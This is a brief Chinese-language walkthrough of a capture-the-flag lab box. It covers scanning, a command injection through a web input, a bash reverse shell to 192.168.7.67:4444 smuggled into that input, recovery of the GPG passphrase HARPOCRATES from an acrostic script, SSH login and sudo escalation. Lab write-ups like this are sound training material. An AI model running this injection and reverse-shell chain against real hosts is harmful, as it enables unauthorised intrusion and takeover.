1.信息收集
端口扫描
nmap -A -p- 192.168.7.204
目录扫描
访问web服务
robots.txt文件
尝试拼接访问
尝试测试漏洞输入whoami,发现存在漏洞
执行whoami | ls ,发现备份文件
直接访问可以下载
2.getshell
nc反弹
whoami | pwd&echo "bash -i >& /dev/tcp/192.168.7.67/4444 0>&1" | bash
3.提权
cd /home
ls-al
查看文件
cd Documents
在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
下,发现了 notes.sh
-> 查看文件内容 -> 不知道干嘛的,找了点文献才知道是“藏头诗”得到密钥:【HARPOCRATES】
gpg -d login.txt.gpg 解密,没有权限
cd /home/bob/Documents/
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
ssh bob@192.168.7.152 -p 25468
sudo su提权